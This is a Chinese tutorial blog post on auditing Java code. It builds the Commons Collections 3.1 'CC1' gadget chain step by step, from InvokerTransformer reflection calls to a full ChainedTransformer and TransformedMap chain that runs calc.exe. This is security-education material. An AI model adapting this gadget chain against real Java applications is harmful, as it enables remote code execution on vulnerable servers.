JAVA代码审计之CC1

最新推荐文章于 2025-03-15 22:02:57 发布

ZZ58

最新推荐文章于 2025-03-15 22:02:57 发布

阅读量429

点赞数 5

分类专栏： java代码审计文章标签： java

本文链接：https://blog.youkuaiyun.com/CheatMyself/article/details/138760560

版权

java代码审计专栏收录该内容

7 篇文章

订阅专栏

JAVA代码审计之CommonsCollection1

1. 环境配置

创建meaven项目，java版本为8u20

  <dependencies>
    <dependency>
      <groupId>commons-collections</groupId>
      <artifactId>commons-collections</artifactId>
      <version>3.1</version>
    </dependency>
 <dependency>

2. CC链介绍

一般情况下调用本地计算器的java代码如下所示：

public class Test {
    public static void main(String[] args) throws Exception {
        //构建一个transformer的数组
        String cmd = "calc";
        Runtime.getRuntime().exec(cmd);
    }
}

2.1 InvokerTransformer.java介绍

InvokerTransformer.java代码，InvokerTransformer为构造函数，里面需要传入方法名称，该方法参数类型，以及传入的参数，实例化之后可以选择调用transform，input.getClass()相当于反射实例化之后.forname()，之后获取方法、返回执行方法。

    public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
        super();
        iMethodName = methodName;
        iParamTypes = paramTypes;
        iArgs = args;
    }


    public Object transform(Object input) {
        if (input == null) {
            return null;
        }
        try {
            Class cls = input.getClass();				
            Method method = cls.getMethod(iMethodName, iParamTypes); 	//使用反射机制获取方法
            return method.invoke(input, iArgs);
                
        } catch (NoSuchMethodException ex) {
            throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' does not exist");
        } catch (IllegalAccessException ex) {
            throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
        } catch (InvocationTargetException ex) {
            throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' threw an exception", ex);
        }
    }

正常调用计算器的代码:

import java.io.IOException;

public class TestCC {
    public static void main(String[] args) throws Exception {
        Runtime.getRuntime().exec("calc");
    }
}

使用InvokerTransformer调用计算器，Runtime.getRuntime()返回一个实例对象，执行方法exec,传入参数“calc”

import org.apache.commons.collections.functors.InvokerTransformer;

public class TestCC {
    public static void main(String[] args) throws Exception {
        //   Runtime.getRuntime().exec("calc");
        Runtime runtime = Runtime.getRuntime();
        //    runtime.exec("calc")
        new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transform(runtime);
    }
}

import org.apache.commons.collections.functors.InvokerTransformer;

import java.lang.reflect.Method;

public class TestCC {
    public static void main(String[] args) throws Exception {
        Class c = Runtime.class;
        Method getRuntimeMethod = c.getMethod("getRuntime",null);
        Runtime runtime = (Runtime) getRuntimeMethod.invoke(null,null);
        new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transform(runtime);
    }
}

import org.apache.commons.collections.functors.InvokerTransformer;

import java.lang.reflect.Method;

public class TestCC {
    public static void main(String[] args) throws Exception {
//        Class c = Runtime.class;
//        Method getRuntimeMethod = c.getMethod("getRuntime",null);
        Method getRuntimeMethod = (Method) new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}).transform(Runtime.class);
//        Runtime runtime = (Runtime) getRuntimeMethod.invoke(null,null);
        Runtime runtime = (Runtime) new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}).transform(getRuntimeMethod);
        new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transform(runtime);
    }
}

完整cc链构造

package org.example;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.util.HashMap;
import java.util.Map;

public class Test {
    public static void main(String[] args) {
        //构建一个transformer的数组
        Transformer[] transformers = new Transformer[] {
                //传入Runtime类
                new ConstantTransformer(Runtime.class),
                //调用getMethod方法
                new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class }, new Object[] {"getRuntime", null }),
                //调用invoke方法
                new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class }, new Object[] {null,null}),
                //调用exec方法
                new InvokerTransformer("exec", new Class[] {String.class}, new Object[] {"calc.exe"})
        };
        //将transformers数组传入ChainedTransformer类
        Transformer transformerChain = new ChainedTransformer(transformers);
        //创建Map并绑定transformerChain
        Map innerMap = new HashMap();
        //包装innerMap
        Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
        //触发回调
        outerMap.put("test1", "xxxx");
    }
}